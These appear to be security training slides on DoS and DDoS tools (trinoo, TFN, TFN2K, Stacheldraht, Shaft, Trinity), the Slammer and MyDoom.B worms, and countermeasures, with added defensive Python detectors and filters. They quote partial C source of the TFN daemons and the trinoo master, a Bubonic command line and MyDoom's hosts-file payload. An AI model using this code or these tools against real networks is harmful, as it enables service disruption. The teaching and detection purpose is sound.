http://www.robertgraham.com/op-ed/jolt2/ 
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DoS Tool: Bubonic



© Bubonic is a DoS exploit that can be run against Windows 2000 machines.

© It works by randomly sending TCP packets with random settings with the goal of increasing the load of the machine, so that it eventually crashes.

c:\> bubonic 12.23.23.2 10.0.0.1 100 
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DoS Tool: Bubonic.c



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DoS Tool: Land and LaTierra



© IP spoofing in combination with the opening of a TCP connection.

© Both IP addresses, source and destination, are modified to be the same—the address of the destination host.

© This results in sending the packet back to itself, because the addresses were the same.
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DoS Tool: Targa



© Targa is a program that can be used to run eight different DoS attacks.

© It is seen as a part of kits compiled for affecting DoS and sometimes even in earlier rootkits.

© The attacker has the option to either launch individual attacks or to try all the attacks until it is successful.

© Targa is a very powerful program and can do a lot of damage to a company's network.






What is a DDoS Attack?



According to the website www.searchsecurity.com:

On the Internet, a distributed denial of service (DDoS) attack is one in which a multitude of compromised systems attack a single target, thereby causing denial of service for users of the targeted system. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to the system to legitimate users.
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DDoS Attacks Characteristics 






© It is a large-scale, coordinated attack on the availability of services of a victim system.

© The services under attack are those of the "primary victim," while the compromised systems used to launch the attack are often called the "secondary victims."

© This makes it difficult to detect because attacks originate from several IP addresses.

© If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

© Perpetrator is able to multiply the effectiveness of the Denial of Service significantly by harnessing the resources of multiple unwitting accomplice computers which serve as attack platforms.
DDoS IRC-Based Model

[Figure: IRC-based DDoS model; diagram not reproduced]
DDoS Attack Taxonomy

• Bandwidth depletion attacks
  • Flood attack
  • UDP and ICMP flood

• Amplification attack
  • Smurf and Fraggle attack

[Figure: RTT latency (ms) and packet loss to www.yahoo.com (204.71.200.68) on February 2, ...; the x-axis runs from 11:30 to 11:20 the following day and shows latency spiking and loss reaching 100% during the attack]
DDoS Attack Taxonomy

DDoS Attacks

Amplification Attack

Classic DDoS tools:

• Trinoo
• Tribe Flood Network (TFN)
• TFN2K
• Stacheldraht
• Shaft
• Trinity
• Knight
• Mstream
• Kaiten

[Figure: DDoS attack diagram; labelled elements are the Zombies and the Victim]

Classic tools presented for proof of concept
DDoS Tool: Trinoo

• Trinoo is credited with being the first DDoS attack tool to be widely distributed and used.

• A distributed tool used to launch coordinated UDP flood denial of service attacks from many sources.

• The attacker instructs the trinoo master to launch a denial of service attack against one or more IP addresses.

• The master instructs the daemons to attack one or more IP addresses for a specified period of time.

• Typically, the trinoo agent gets installed on a system that has been compromised through a remote buffer overrun exploit.

Classic tool presented for proof of concept
DDoS Tool: Tribe Flood Network

• Provides the attacker with the ability to wage both bandwidth depletion and resource depletion attacks.

• The TFN tool provides for UDP and ICMP flooding, as well as TCP SYN and Smurf attacks.

• The agents and handlers communicate with ICMP_ECHOREPLY packets. These are harder to detect than UDP traffic and pass through stateless firewalls that permit inbound echo replies; the daemon listing below opens a raw ICMP socket for exactly this purpose.

Classic tool presented for proof of concept







td.c (TFN daemon) as shown in the slide:

/* td.c - tribe flood network daemon
   (c) 1999 by Mixter - PRIVATE */

#include "config.h"
#include "tribe.h"
#include "control.h"
#include "syn.c"
#include "udp.c"
#include "icmp.c"

int
main (int puke, char **fart)
{
  char buf[1024], target[1024], answer[1024];
  struct iphdr *ip = (struct iphdr *) buf;
  struct icmphdr *icmp = (struct icmphdr *) (buf + sizeof (struct iphdr));
  char *p = (buf + sizeof (struct iphdr) + sizeof (struct icmphdr));
  int lsock, i, whereami, port4syn = 0;

  if (geteuid ())
    exit (-1);                              /* raw sockets need root */
  strcpy (fart[0], hideme);                 /* overwrite argv[0] to disguise the process name */
  lsock = socket (AF_INET, SOCK_RAW, 1);    /* raw ICMP socket: commands arrive as echo replies */
  close (0);
  close (1);
  close (2);
  if (fork ())
    exit (0);                               /* daemonize */

  signal (SIGHUP, SIG_IGN);
  signal (SIGTERM, SIG_IGN);
  signal (SIGCHLD, SIG_IGN);

  while (1)
    {
      i = read (lsock, buf, 1024);
DDoS Tool: TFN2K

• Based on the TFN architecture, with features designed specifically to make TFN2K traffic difficult to recognize and filter.

• Remotely executes commands, hides the true source of the attack using IP address spoofing, and transports TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP.

• UNIX, Solaris, and Windows NT platforms that are connected to the Internet, directly or indirectly, are susceptible to this attack.

Classic tool presented for proof of concept
td.c (TFN2K server) as shown in the slide:

/*
 * Tribe FloodNet - 2k edition
 * by Mixter <mixter@newyorkoffice.com>
 *
 * td.c - tribe flood server
 *
 * This program is distributed for educational purposes and without any
 * explicit or implicit warranty; in no event shall the author or
 * contributors be liable for any direct, indirect or incidental damages
 * arising in any way out of the use of this software.
 */

#include "tribe.h"

extern int flooding, nospoof, port4syn, psize;
extern unsigned long myip;

extern void security_through_obscurity (int);
void tribe_cmd (char, char *, char *);

int
main (int argc, char **argv)
{
  char buf[BS], clear[BS];
  struct ip *iph = (struct ip *) buf;
  struct tribe *tribeh = (struct tribe *) clear;
  int isock, tsock, usock, i;
  char *p = NULL, *data = (clear + sizeof (struct tribe));
  fd_set rfds;

  /* one raw socket per transport so commands can arrive over ICMP, TCP or UDP */
  isock = socket (AF_INET, SOCK_RAW, ICMP);
  tsock = socket (AF_INET, SOCK_RAW, TCP);
  usock = socket (AF_INET, SOCK_RAW, UDP);

  if (geteuid ())
DDoS Tool: Stacheldraht

• German for "barbed wire," it is a DDoS attack tool based on earlier versions of TFN.

• Like TFN, it includes ICMP flood, UDP flood, and TCP SYN attack options.

• Stacheldraht also provides an encrypted telnet-like connection, using symmetric-key encryption, between the attacker and the handler systems. Administrators who capture this traffic cannot read the commands, although the connection itself, and the handler-to-agent traffic, can still be observed.

Classic tool presented for proof of concept
DDoS Tool: Shaft

• It is a derivative of the trinoo tool which uses UDP communication between handlers and agents.

• Shaft provides statistics on the flood attack. These tell the attacker when the victim system is completely down, and therefore when to stop adding zombie machines to the DDoS attack. Shaft provides UDP, ICMP, and TCP flooding attack options.

• One interesting signature of Shaft is that the sequence number for all TCP packets is 0x28374839, which makes its SYN floods easy to match with a packet filter or IDS rule.

Classic tool presented for proof of concept
DDoS Tool: Trinity

• Trinity appears to use primarily port 6667 (IRC) for command and control, and also has a backdoor program that listens on TCP port 33270.

• Trinity has a wide variety of attack options including UDP, TCP SYN, TCP ACK, and TCP NUL packet floods, as well as TCP fragment floods, TCP RST packet floods, TCP random flag packet floods, and TCP established floods.

• It has the ability to randomize all 32 bits of the source IP address.

Classic tool presented for proof of concept
DDoS Tool: Trinity

master.c as shown in the slide (the version banner identifies this listing as the trinoo master):

#ifdef CRYPTKEY
char *encrypt_string(char *, char *);
char *decrypt_string(char *, char *);
#endif

main(int argc, char *argv[])
{
    struct sockaddr_in master, from, tcpmast, tcpconn;
    int sock, sock2, fromlen, numread, bewm=0, auth, maxfd, alt;
    int list=1, l, poke, hoe, blist, argi, outport=27444, ttout=300, idle=0;  /* 27444/udp: master -> daemon */
    int pongr=0;
    FILE *out;
    char buf[1024], outbuf[1024], old, comm[15], *argl;
    char pass[8], *uptime, *dec, *enc;
    long lookip;
    fd_set myfds;
    time_t now, hr, min, onlineat;
    struct timeval tv;
    struct hostent *he;
    old = 0 - 28;

    if (argv[1]) { if (strcmp(argv[1], "-v")==0) { printf("trinoo %s\n", version); exit(0); } }

    sprintf(pass, "l44adsl");               /* hard-coded daemon password */

    if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
        perror("sock");
        exit(-1);
    }

    if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("sock");
        exit(-1);
    }

    printf("?? ");                          /* attacker must supply the master password */
    fgets(buf, 1024, stdin);
    buf[strlen(buf) - 1] = 0;

    if (strcmp((char *) crypt(buf, "On"), "OnmlVNMXqRMyiwi") != 0) {
        exit(-1);
    }
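The fixed sequence number, the backdoor port and the control port quoted on the Shaft, Trinity and trinoo slides, together with TFN's use of ICMP echo replies, are exactly the kind of indicator a network monitor can match. The following Python is an added example (not the courseware's and not any tool's code) that runs those four checks over constructed packet records; the dict fields stand in for what a pcap decoder would supply, and the addresses are from documentation and private ranges.

```python
# Indicators taken from the tool descriptions on these slides and the master.c listing.
SHAFT_TCP_SEQ = 0x28374839           # Shaft: same sequence number in every TCP flood packet
TRINITY_BACKDOOR_PORT = 33270        # Trinity: backdoor listener
TRINOO_MASTER_TO_DAEMON_UDP = 27444  # trinoo: outport=27444 in master.c


def scan_packets(packets):
    """Return a list of (source ip, rule) alerts.

    The TFN check is stateful: an ICMP echo reply is only expected when the matching
    echo request was seen leaving first. An unsolicited reply is how TFN handlers
    talk to their agents."""
    alerts = []
    echo_requests = set()  # (requester, responder, icmp id)
    for p in packets:
        if p["proto"] == "icmp":
            if p["type"] == 8:
                echo_requests.add((p["src"], p["dst"], p["id"]))
            elif p["type"] == 0 and (p["dst"], p["src"], p["id"]) not in echo_requests:
                alerts.append((p["src"], "tfn: unsolicited ICMP echo reply"))
        elif p["proto"] == "tcp":
            if p.get("seq") == SHAFT_TCP_SEQ:
                alerts.append((p["src"], "shaft: fixed TCP sequence number 0x28374839"))
            if "S" in p["flags"] and p["dport"] == TRINITY_BACKDOOR_PORT:
                alerts.append((p["src"], "trinity: connection to backdoor port 33270"))
        elif p["proto"] == "udp" and p["dport"] == TRINOO_MASTER_TO_DAEMON_UDP:
            alerts.append((p["src"], "trinoo: master-to-daemon UDP port 27444"))
    return alerts


def rules_fired(packets):
    """Set of tool names whose indicator matched at least once."""
    return {rule.split(":")[0] for _, rule in scan_packets(packets)}


def icmp(src, dst, typ, ident):
    return {"proto": "icmp", "src": src, "dst": dst, "type": typ, "id": ident}


def tcp(src, sport, dst, dport, flags, seq=0):
    return {"proto": "tcp", "src": src, "sport": sport, "dst": dst,
            "dport": dport, "flags": flags, "seq": seq}


def udp(src, sport, dst, dport):
    return {"proto": "udp", "src": src, "sport": sport, "dst": dst, "dport": dport}


# Constructed sample traffic. The first three records are benign; each of the
# remaining four reproduces one indicator from the slides.
SAMPLE_PACKETS = [
    icmp("10.0.0.5", "198.51.100.7", 8, 1),
    icmp("198.51.100.7", "10.0.0.5", 0, 1),                       # reply to our own request
    tcp("10.0.0.5", 40000, "198.51.100.7", 80, "S", seq=123456),   # ordinary SYN
    icmp("203.0.113.9", "10.0.0.5", 0, 77),                       # TFN handler -> agent command
    tcp("10.0.0.6", 1025, "198.51.100.7", 80, "S", seq=SHAFT_TCP_SEQ),
    tcp("203.0.113.9", 5555, "10.0.0.6", 33270, "S"),             # Trinity backdoor
    udp("203.0.113.9", 5556, "10.0.0.6", 27444),                  # trinoo master -> daemon
]

if __name__ == "__main__":
    for src, rule in scan_packets(SAMPLE_PACKETS):
        print(src, rule)
```

Port and sequence-number matches are cheap but brittle (a recompiled tool changes them); the unsolicited-echo-reply check is the more durable of the four because it keys on the protocol abuse rather than on a constant.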
DDoS Tool: Knight and Kaiten

• Knight:
  • IRC-based DDoS attack tool that was first reported in July 2001.
  • It provides SYN attacks, UDP flood attacks, and an urgent pointer flooder.
  • Can be installed by using a Trojan horse program called Back Orifice.
  • Knight is designed to run on Windows operating systems.

• Kaiten:
  • Another IRC-based DDoS attack tool.
  • Is based on Knight, and was first reported in August 2001.
  • Supports a variety of attacking features. It includes code for UDP and TCP flooding attacks, for SYN attacks, and a PUSH+ACK attack.
  • It also randomizes the 32 bits of its source address.

Classic tools presented for proof of concept
DDoS Tool: Mstream

• Uses spoofed TCP packets with the ACK flag set to attack the target.

• The Mstream tool consists of a handler and an agent portion, much like previously known DDoS tools such as trinoo.

• Access to the handler is password protected.

• The apparent intent of 'stream' is to cause the handler to instruct all known agents to launch a TCP ACK flood against a single target IP address for a specified duration.

Classic tool presented for proof of concept
Scenario

A few hours after the launch of the e-business paper, DDoS attacks crippled the website. Continuous bogus requests flooded the website and consumed all resources. Experts confirmed that thousands of compromised hosts were deployed to unleash the attack.

1. How does Sam react to the situation?

2. Estimate the loss of goodwill caused by the attack. What are the business implications?

3. How can one prevent such attacks? What are the proactive steps involved?
The Reflected DoS Attacks

[Figure: the attacker sends SYNs carrying the victim's source address to many reflectors; their SYN/ACK replies converge on the Target/Victim Network]
Reflection of the Exploit

• The TCP three-way handshake is exploited.

• The attacking machines send out huge volumes of SYN packets with the IP source address set to the target machine.

• Any general-purpose TCP connection-accepting Internet server could be used to reflect SYN packets.

• For each SYN packet received by the TCP reflection server, up to four SYN/ACK packets will generally be sent, because the reflector retransmits its SYN/ACK when the expected ACK never arrives. The reflectors therefore amplify the attacker's traffic, and the spoofed source addresses hide where it really came from.

• It degrades the performance of the aggregation router in front of the victim.






Countermeasures for Reflected DoS

• TCP port 179 (BGP) on routers can be filtered so that the routers themselves do not act as reflectors.

• Blocking all inbound packets originating from the service port range will block most of the traffic being innocently generated by reflection servers. Done statelessly this also blocks legitimate replies to the site's own outbound connections, so in practice the filter should admit a SYN/ACK only when the site sent the matching SYN.

• ISPs could prevent the transmission of fraudulently addressed packets by filtering their customers' source addresses.

• Servers could be programmed to recognize a SYN source IP address that never completes its connections.
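As an added example (not code from the courseware), the following Python models the three mechanics above: the reflector's amplification factor, the stateful form of the inbound service-port filter on the victim side, and the "never completes its connections" check on the reflector side. The addresses are documentation ranges, and the threshold of 20 half-open connections per source is an assumption chosen for the demo; a real deployment would tune it to the server's normal traffic.

```python
from collections import defaultdict

SERVICE_PORTS = range(1, 1024)  # the "service port range" the slide proposes to block inbound


def synack_amplification(syn_count: int, retransmits: int = 3) -> int:
    """Packets a reflector emits per spoofed SYN: the SYN/ACK plus its retransmissions.
    The slide's "up to four SYN/ACKs" corresponds to three retransmissions, sent
    because the ACK that would complete the handshake never arrives."""
    return syn_count * (1 + retransmits)


class VictimSideFilter:
    """Stateful form of 'block inbound packets from the service port range': a SYN/ACK
    from a service port is admitted only if this site sent the matching SYN."""

    def __init__(self):
        self.pending = set()  # (local ip, local port, remote ip, remote port) of our own SYNs

    def outbound(self, pkt):
        if pkt["flags"] == "S":
            self.pending.add((pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"]))

    def inbound(self, pkt) -> str:
        if pkt["flags"] == "SA" and pkt["sport"] in SERVICE_PORTS:
            key = (pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
            return "pass" if key in self.pending else "drop: unsolicited SYN/ACK"
        return "pass"


class ReflectorSideMonitor:
    """'Recognize a SYN source that never completes its connections': track half-open
    connections per source address. A spoofed victim never sends the final ACK."""

    def __init__(self, threshold: int = 20):
        self.half_open = defaultdict(set)  # source ip -> {source port, ...}
        self.threshold = threshold

    def observe(self, pkt):
        if pkt["flags"] == "S":
            self.half_open[pkt["src"]].add(pkt["sport"])
        elif pkt["flags"] == "A":
            self.half_open[pkt["src"]].discard(pkt["sport"])

    def suspicious_sources(self):
        return sorted(ip for ip, ports in self.half_open.items() if len(ports) >= self.threshold)


# Constructed traffic; 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
VICTIM, REFLECTOR, OTHER_SERVER, HONEST_CLIENT = "192.0.2.10", "198.51.100.7", "198.51.100.8", "203.0.113.5"


def tcp(src, sport, dst, dport, flags):
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "flags": flags}


def demo_victim_filter():
    """Victim border: one SYN/ACK for a connection we opened, then four reflected ones."""
    f = VictimSideFilter()
    f.outbound(tcp(VICTIM, 40000, OTHER_SERVER, 80, "S"))
    decisions = [f.inbound(tcp(OTHER_SERVER, 80, VICTIM, 40000, "SA"))]
    decisions += [f.inbound(tcp(REFLECTOR, 80, VICTIM, 1025 + i, "SA")) for i in range(4)]
    return decisions


def demo_reflector_monitor():
    """Reflector: 50 spoofed SYNs 'from' the victim that are never acknowledged,
    plus three honest connections that complete normally."""
    m = ReflectorSideMonitor(threshold=20)
    for i in range(50):
        m.observe(tcp(VICTIM, 1025 + i, REFLECTOR, 80, "S"))  # attacker's spoofed SYN
    for i in range(3):
        m.observe(tcp(HONEST_CLIENT, 3000 + i, REFLECTOR, 80, "S"))
        m.observe(tcp(HONEST_CLIENT, 3000 + i, REFLECTOR, 80, "A"))  # handshake completed
    return m.suspicious_sources()


if __name__ == "__main__":
    print("victim filter:", demo_victim_filter())
    print("reflector flags:", demo_reflector_monitor())
    print("1000 spoofed SYNs become", synack_amplification(1000), "SYN/ACKs at the victim")
```

Note that the reflector-side check flags the victim's address, not the attacker's: that is the nature of a reflected attack, and it is why a reflector that blocks the flagged address also cuts the real victim off.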
DDoS Countermeasures

Taxonomy of DDoS Countermeasures

• Three essential components:
  • Preventing secondary victims, and detecting and neutralizing handlers
  • Detecting or preventing the attack, mitigating or stopping the attack, and deflecting the attack
  • The post-attack component, which involves network forensics
Preventing Secondary Victims

• A heightened awareness of security issues and prevention techniques from all Internet users.

• Systems should be scanned for agent programs.

• Installing anti-virus and anti-Trojan software and keeping it up to date can prevent installation of the agent programs.

• Because this is daunting for the average "web-surfer," recent work has proposed built-in defensive mechanisms in the core hardware and software of computing systems.
Detect and Neutralize Handlers

• Study of communication protocols and traffic patterns between handlers and clients, or handlers and agents, in order to identify network nodes that might be infected with a handler.

• There are usually few DDoS handlers deployed compared to the number of agents, so neutralizing a few handlers can render many agents useless and thwart the attack.
Detect Potential Attacks

• Egress filtering
  • Scanning the packet headers of IP packets leaving a network

• There is a good probability that the spoofed source address of DDoS attack packets will not be a valid source address of the specific sub-network.

• Placing a firewall or packet sniffer at the edge of the sub-network that filters out any outbound traffic whose source IP address does not belong to that sub-network stops agents inside from sending spoofed packets.
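As an added example (not code from the courseware), the following Python implements the egress rule the slide describes, together with its mirror image at the same border (ingress filtering: nothing arriving from outside may claim one of the site's own addresses, which is what stops Land-style and reflected-attack spoofing from reaching hosts inside). The two prefixes in INTERNAL_NETS and the sample flows are assumptions for the demo.

```python
import ipaddress

# Assumed site prefixes (documentation ranges); a real filter reads these from the router config.
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24"), ipaddress.ip_network("198.51.100.0/25")]


def egress_allowed(src_ip: str, nets=INTERNAL_NETS) -> bool:
    """Egress rule: a packet may leave only if its source address belongs to our prefixes."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in nets)


def ingress_allowed(src_ip: str, nets=INTERNAL_NETS) -> bool:
    """Complementary ingress rule: a packet arriving from outside must not carry one of our addresses."""
    return not egress_allowed(src_ip, nets)


def filter_flows(flows, nets=INTERNAL_NETS):
    """flows: iterable of (direction, src, dst) with direction 'out' or 'in'.
    Returns (passed, dropped) lists in input order."""
    passed, dropped = [], []
    for direction, src, dst in flows:
        ok = egress_allowed(src, nets) if direction == "out" else ingress_allowed(src, nets)
        (passed if ok else dropped).append((direction, src, dst))
    return passed, dropped


# Constructed sample flows seen at the site border.
SAMPLE_FLOWS = [
    ("out", "192.0.2.15", "203.0.113.9"),     # legitimate outbound
    ("out", "10.77.0.3", "203.0.113.9"),      # agent inside spoofing an RFC 1918 source
    ("out", "203.0.113.200", "203.0.113.9"),  # agent inside spoofing a foreign public address
    ("in", "203.0.113.9", "192.0.2.15"),      # legitimate inbound
    ("in", "192.0.2.15", "192.0.2.15"),       # inbound packet claiming our own address (Land-style)
]


def demo():
    return filter_flows(SAMPLE_FLOWS)


if __name__ == "__main__":
    passed, dropped = demo()
    print("passed:", passed)
    print("dropped:", dropped)
```

Egress filtering does not protect the site that deploys it; it protects everyone else from agents hosted there, which is why the slide lists it under detecting potential attacks rather than under mitigation.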






Mitigate or Stop the Effects of DDoS Attacks

• Load balancing
  • Providers can increase bandwidth on critical connections to prevent them from going down in the event of an attack.
  • Replicating servers can help provide additional failsafe protection.
  • Balancing the load across the servers in a multiple-server architecture improves normal performance and also mitigates the effect of a DDoS attack.

• Throttling
  • This method sets up the routers in front of a server with logic to adjust (throttle) incoming traffic to levels that are safe for the server to process.
• Honeypots
  • Systems that are set up with limited security to be an enticement for an attacker.
  • Serve as a means for gaining information about attackers by storing a record of their activities and learning what types of attacks and software tools the attackers used.
Post-Attack Forensics

• Traffic pattern analysis
  • Data can be analyzed, post-attack, to look for specific characteristics within the attacking traffic.

• This characteristic data can be used for updating load balancing and throttling countermeasures.

• DDoS attack traffic patterns can help network administrators develop new filtering techniques for preventing such traffic from entering or leaving their networks.
Packet Traceback

• This allows back-tracing the attacker's traffic and possibly identifying the attacker.

• Additionally, when the attacker sends vastly different types of attacking traffic, this method assists in providing the victim system with information that might help develop filters to block the attack.

• Event logs:
  • Keep logs of the DDoS attack information in order to do a forensic analysis and to assist law enforcement in the event the attacker does severe financial damage.
Worms

Worms are distinguished from viruses by the fact that a virus requires some form of human intervention to infect a computer, whereas a worm spreads on its own.
[Figure: RIPE NCC Test Traffic Measurement statistics during the worm-driven DDoS. Delay and hops: min. hops 11, max. hops 28. Packets sent/valid: total 1595, valid 1261 (79.1%), send bad 0, recv bad 0, loss 334 (21%). Packets lost: 2.5th percentile 0.0%, median 0.0%, 97.5th percentile 100.0%. Overall: time period 1 day, 13 routing vectors, 19 flaps, 168 bins, 3.2 minutes/bin.]

Source: http://www.ripe.net/ttm/worm/ddos2.gif
Slammer Worm

• A worm targeting SQL Server computers. It is self-propagating malicious code that exploits a stack buffer overflow allowing execution of arbitrary code on the SQL Server computer.

• The worm crafts packets of 376 bytes and sends them to randomly chosen IP addresses on port 1434/udp (the SQL Server Resolution Service). If the packet reaches a vulnerable machine, that machine becomes infected and begins to propagate as well.

• Compromise by the worm confirms that the system is vulnerable to a remote attacker executing arbitrary code as the local SYSTEM user.
Spread of Slammer Worm - 30 min

• The Slammer worm (also known as the Sapphire worm) was the fastest worm in history: it doubled in size every 8.5 seconds at its peak.

• From the time it began to infect hosts (around 05:30 UTC) on Saturday, Jan. 25, 2003, it managed to infect more than 90 percent of the vulnerable hosts within 10 minutes, using a well-known vulnerability in Microsoft's SQL Server.

• Slammer eventually infected more than 75,000 hosts, flooded networks all over the world, and caused disruptions to financial institutions, ATMs, and even an election in Canada.

Source: http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/slammermapnoflash.html
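The two figures on this slide, a doubling time of 8.5 seconds and 90 percent of roughly 75,000 hosts infected within 10 minutes, are consistent with each other, and the following Python shows why. It is an added example, not part of the courseware: it applies the standard logistic model of a random-scanning worm (new infections per second are proportional to the infected fraction times the uninfected fraction) with the slide's numbers, both in closed form and as a step-by-step simulation. Treating the 75,000 eventual infections as the whole vulnerable population is an assumption.

```python
import math

DOUBLING_TIME_S = 8.5       # peak doubling time quoted on the slide
VULNERABLE_HOSTS = 75_000   # hosts eventually infected, assumed to be the vulnerable population
TARGET_FRACTION = 0.90      # "more than 90 percent of the vulnerable hosts"


def growth_rate(doubling_time: float) -> float:
    """Per-second rate k in da/dt = k*a*(1-a) that yields the observed early doubling time.
    For a random-scanning worm k = (scans per second per host) * N / 2**32."""
    return math.log(2) / doubling_time


def infected_fraction(t: float, k: float, a0: float) -> float:
    """Closed-form logistic solution: fraction of the vulnerable population infected at time t."""
    return 1.0 / (1.0 + ((1.0 - a0) / a0) * math.exp(-k * t))


def time_to_fraction(target: float, k: float, a0: float) -> float:
    """Invert the logistic curve: seconds until `target` of the population is infected."""
    return math.log((target / (1.0 - target)) / (a0 / (1.0 - a0))) / k


def simulate(k: float, population: int, dt: float = 0.05, target: float = TARGET_FRACTION) -> float:
    """Step the same model forward from a single infected host. Each infected host's scans hit
    a still-uninfected vulnerable host with probability (1 - a), so the expected number of new
    infections per step is dt * k * infected * (1 - a). Returns seconds until `target`."""
    infected, t = 1.0, 0.0
    while infected / population < target:
        infected += dt * k * infected * (1.0 - infected / population)
        t += dt
    return t


def slammer_estimate():
    """Seconds to 90% infection from one seed host, closed form and simulated."""
    k = growth_rate(DOUBLING_TIME_S)
    a0 = 1.0 / VULNERABLE_HOSTS
    return {"k": k,
            "closed_form_s": time_to_fraction(TARGET_FRACTION, k, a0),
            "simulated_s": simulate(k, VULNERABLE_HOSTS)}


if __name__ == "__main__":
    r = slammer_estimate()
    print("k = %.4f /s, 90%% infected after %.0f s (closed form), %.0f s (simulated)"
          % (r["k"], r["closed_form_s"], r["simulated_s"]))
```

With the slide's numbers the model reaches 90 percent in under three minutes, well inside the 10 minutes reported. The practical lesson is that a worm with this growth rate saturates before any human-driven response is possible; only pre-deployed filtering (here, dropping 1434/udp at the border) or patched hosts change the outcome.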
MyDoom.B

• The MYDOOM.B variant is a mass-mailing worm.

• On P2P networks, W32/MyDoom.B may appear as a file named {attackXP-1.26, BlackIce_Firewall_Enterpriseactivation_crack, MSD4-01_hotFix, NessusScan_pro, icq2004-final, winamp5, xsharez_scanner, zapSetup_40_148}.{exe, scr, pif, bat}.

• It can perform DoS against www.sco.com and www.microsoft.com.

• It has a backdoor component and opens port 1080 to allow remote access to infected machines. It may also use ports 3128, 80, 8080, and 10080.

• It runs on Windows 95, 98, ME, NT, 2000, and XP.
MyDoom.B

• The virus overwrites the hosts file (%windir%\system32\drivers\etc\hosts on Windows NT/2000/XP, %windir%\hosts on Windows 95/98/ME) to prevent DNS resolution for a number of sites, including several antivirus vendors, effecting a denial of service against their update and support sites:

127.0.0.1 localhost localhost.localdomain
0.0.0.0 0.0.0.0
0.0.0.0 engine.awaps.net awaps.net www.awaps.net ad.doubleclick.net
0.0.0.0 spa.atdmt.com atdmt.com click.atdmt.com clicks.atdmt.com
0.0.0.0 media.fastclick.net fastclick.net www.fastclick.net ad.fastclick.net
0.0.0.0 ads.fastclick.net banner.fastclick.net banners.fastclick.net
0.0.0.0 www.sophos.com sophos.com ftp.sophos.com f-secure.com www.f-secure.com
0.0.0.0 ftp.f-secure.com securityresponse.symantec.com
0.0.0.0 www.symantec.com symantec.com service1.symantec.com
0.0.0.0 liveupdate.symantec.com update.symantec.com updates.symantec.com
0.0.0.0 support.microsoft.com downloads.microsoft.com
0.0.0.0 download.microsoft.com windowsupdate.microsoft.com
0.0.0.0 office.microsoft.com msdn.microsoft.com go.microsoft.com
0.0.0.0 nai.com www.nai.com vil.nai.com secure.nai.com www.networkassociates.com
0.0.0.0 networkassociates.com avp.ru www.avp.ru www.kaspersky.ru
0.0.0.0 www.viruslist.ru viruslist.ru avp.ch www.avp.ch www.avp.com
0.0.0.0 avp.com us.mcafee.com mcafee.com www.mcafee.com dispatch.mcafee.com
0.0.0.0 download.mcafee.com mast.mcafee.com www.trendmicro.com
0.0.0.0 www3.ca.com ca.com www.ca.com www.my-etrust.com
0.0.0.0 my-etrust.com ar.atwola.com phx.corporate-ir.net
0.0.0.0 www.microsoft.com

• On February 3, 2004, W32/MyDoom.B removes the entry for www.microsoft.com.
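A hosts file rewritten like the one above is a reliable post-infection indicator, and it survives the worm's removal unless someone cleans it. The following Python is an added example (not the courseware's code and not a vendor's removal tool): it parses a hosts file, flags every non-local name that has been pointed at a sinkhole address, rates entries for security-vendor and update domains as high severity, and rebuilds the file without them. The vendor suffix list and the sample file (a constructed subset of the slide's list) are assumptions for the demo.

```python
SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1"}
LOCAL_NAMES = {"localhost", "localhost.localdomain"}

# Domains whose loss silently disables AV updates and Windows Update (assumed list, taken
# from the entries on the slide).
VENDOR_SUFFIXES = ("symantec.com", "sophos.com", "f-secure.com", "mcafee.com", "nai.com",
                   "networkassociates.com", "kaspersky.ru", "avp.ru", "avp.ch", "avp.com",
                   "viruslist.ru", "trendmicro.com", "ca.com", "my-etrust.com", "microsoft.com")


def is_vendor_name(name: str) -> bool:
    """Match whole DNS labels so that e.g. 'mecca.com' does not match the 'ca.com' suffix."""
    n = name.lower()
    return any(n == s or n.endswith("." + s) for s in VENDOR_SUFFIXES)


def parse_hosts(text: str):
    """Yield (address, [names]) for each non-comment, non-blank line of a hosts file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) >= 2:
            yield fields[0], fields[1:]


def find_sinkholed_names(text: str):
    """Return (address, name, severity) for every non-local name mapped to a sinkhole address."""
    findings = []
    for addr, names in parse_hosts(text):
        if addr not in SINKHOLE_ADDRESSES:
            continue
        for name in names:
            if name.lower() in LOCAL_NAMES or name in SINKHOLE_ADDRESSES:
                continue
            findings.append((addr, name, "high" if is_vendor_name(name) else "medium"))
    return findings


def clean_hosts(text: str) -> str:
    """Rebuild the file: keep comments and ordinary entries, and keep sinkhole lines only
    for the local names they legitimately carry (the loopback 'localhost' entry)."""
    kept = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2 or fields[0] not in SINKHOLE_ADDRESSES:
            kept.append(raw)
            continue
        local = [n for n in fields[1:] if n.lower() in LOCAL_NAMES]
        if local:
            kept.append(fields[0] + " " + " ".join(local))
    return "\n".join(kept) + "\n"


# Constructed sample: a hosts file after a MyDoom.B-style overwrite (subset of the slide's list).
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1 localhost localhost.localdomain
0.0.0.0 0.0.0.0
0.0.0.0 engine.awaps.net awaps.net www.awaps.net ad.doubleclick.net
0.0.0.0 www.sophos.com sophos.com ftp.sophos.com f-secure.com www.f-secure.com
0.0.0.0 www.symantec.com symantec.com liveupdate.symantec.com
0.0.0.0 download.microsoft.com windowsupdate.microsoft.com
0.0.0.0 www.microsoft.com
"""

if __name__ == "__main__":
    for addr, name, severity in find_sinkholed_names(SAMPLE_HOSTS):
        print(severity, addr, name)
    print(clean_hosts(SAMPLE_HOSTS))
```

On a real Windows host the file to read is %windir%\system32\drivers\etc\hosts as the slide states; the "medium" findings (ad networks) are also placed there by ad-blocking hosts lists, so only the "high" ones point unambiguously at malware.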
MyDoom.B

[Screenshot: Symantec Security Response page for W32.Mydoom.A@mm, with the sections "threat assessment", "technical details", "recommendations" and "removal instructions"]

